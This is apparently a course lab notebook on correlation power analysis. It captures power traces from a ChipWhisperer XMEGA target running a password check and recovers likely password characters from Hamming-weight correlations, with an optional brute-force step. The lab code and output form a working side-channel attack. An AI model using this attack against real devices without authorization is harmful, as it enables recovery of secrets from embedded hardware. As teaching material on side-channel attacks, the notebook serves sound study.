# Lecture 4: Password CPA Attack - Attack

## Exercise 1

In [1]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook

output_notebook()

Loading BokehJS ...

In [2]:
import numpy as np

HW = [bin(n).count("1") for n in range(0, 256)]

def hw(n):
    if isinstance(n, str):
        return HW[ord(n)]
    return HW[n]

hw_vec = np.vectorize(hw)

def pearson(x, y):
    x_mean = np.mean(x)
    y_mean = np.mean(y)
    return sum((x - x_mean) * (y - y_mean)) / np.sqrt(sum((x - x_mean) ** 2) * sum((y - y_mean) ** 2))

In [3]:
import numpy as np
import bokeh.palettes
import bokeh.layouts

size = 100
data = []
data.append(5 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size))
data.append(np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 10)
data.append(-3 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 200)
data.append(100 * np.sin(np.array(range(size)) / size * np.pi) + np.random.uniform(-size/10, size/10, size=size))

plots = []

for i in range(len(data)):
    p = figure()
    plots.append(p)
    p.circle(
        range(size), 
        data[i], 
        color=bokeh.palettes.Set1_6[i],
        legend_label='pearson(range(size), data[{}]) = {:.3f}'.format(i, pearson(range(size), data[i]))
    )

show(bokeh.layouts.gridplot(children=plots, ncols=2, sizing_mode='scale_width', height=300))


## Exercise 2

In [4]:
def pearson_pointwise(traces, intermediates):
    intermediates_diff = intermediates - np.mean(intermediates)
    intermediates_sqrt = np.sqrt(np.sum(intermediates_diff ** 2))
    traces_diff = traces - np.mean(traces, axis=0)
    
    return np.sum(traces_diff * intermediates_diff[:, None], axis=0) / (
        np.sqrt(np.sum(traces_diff ** 2, axis=0)) * intermediates_sqrt
    )

In [5]:
import sys
sys.path.insert(0, '..')
import securec
from securec import util
scope, target = util.init()

In [6]:
securec.util.compile_and_flash('./4_password_fixed.c')

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2045 bytes
✓


In [7]:
import numpy as np

scope.default_setup()

def capture(attempt, samples=500):
    scope.adc.samples = samples
    if isinstance(attempt, str):
        attempt = attempt.encode('iso-8859-1')
    elif isinstance(attempt, int):
        attempt = bytes([attempt])
    scope.arm()
    target.simpleserial_write(0x01, attempt + b'\x00' * (10 - len(attempt)))
    result = target.simpleserial_read(0x01, 1)
    return np.array(util.capture()), not bool(result[0])


In [8]:
import random
import tqdm
import tqdm.notebook

trace_samples = 500
trace_nums = 1000

traces = []
attempts = []
for _ in tqdm.notebook.tqdm(range(trace_nums)):
    attempt = bytes([random.randint(0, 255) for _ in range(10)])
    traces.append(capture(attempt, samples=trace_samples)[0])
    attempts.append(attempt)
traces = np.array(traces)
attempts = np.array([list(a) for a in attempts])


  0%|          | 0/1000 [00:00<?, ?it/s]

ERROR:ChipWhisperer Target:Device did not ack


In [9]:
import itertools

def attack_cpa_bestof(attempts, traces, charlist='abcdefghijklmnopqrstuvwxyz', brute_force_rest=False):
    bestfits = []
    for idx in range(8):
        maxpearsons = []
        for guess in charlist:
            maxpearsons.append((max(abs(pearson_pointwise(traces, hw_vec(attempts[:, idx] ^ ord(guess))))), guess))
        maxchars = list(sorted(maxpearsons, reverse=True))
        bestfits.append(maxchars[:4])
        print(idx, maxchars[:4])

    if brute_force_rest:
        for attempt in tqdm.notebook.tqdm(itertools.product(*map(lambda maxchars: [b[1] for b in maxchars], bestfits))):
            attempt = ''.join(attempt)
            if capture(attempt)[1]:
                return attempt
    
attack_cpa_bestof(attempts, traces)

/tmp/ipykernel_76006/3214675746.py:6: RuntimeWarning: invalid value encountered in true_divide
  return np.sum(traces_diff * intermediates_diff[:, None], axis=0) / (


0 [(0.859541011297487, 'i'), (0.7855989952179087, 'h'), (0.7324152128425697, 'a'), (0.6921825180831856, 'm')]
1 [(0.7502693719594202, 'n'), (0.6466224929478889, 'l'), (0.6418217425004097, 'i'), (0.6075768565039585, 'j')]
2 [(0.8218417743036083, 'f'), (0.6924549939104822, 'g'), (0.6721975571515586, 'n'), (0.663054247877452, 'b')]
3 [(0.7660589853440821, 'i'), (0.6496161480867453, 'e'), (0.6319659261750828, 'h'), (0.606210524212505, 'a')]
4 [(0.8559853452868521, 'n'), (0.7254552737980658, 'o'), (0.6516298210165052, 'j'), (0.6383830722048119, 'l')]
5 [(0.7496709472733867, 'e'), (0.6729438794977166, 'a'), (0.6644309648492074, 'n'), (0.6030745304879204, 'd')]
6 [(0.585986280280327, 'j'), (0.5530467553235293, 'o'), (0.5467128541257102, 'h'), (0.5369128480413272, 'b')]
7 [(0.6090727354113405, 'n'), (0.5891620535820369, 'f'), (0.5858233843714372, 'b'), (0.5380464324131885, 'd')]


In [10]:
util.exit()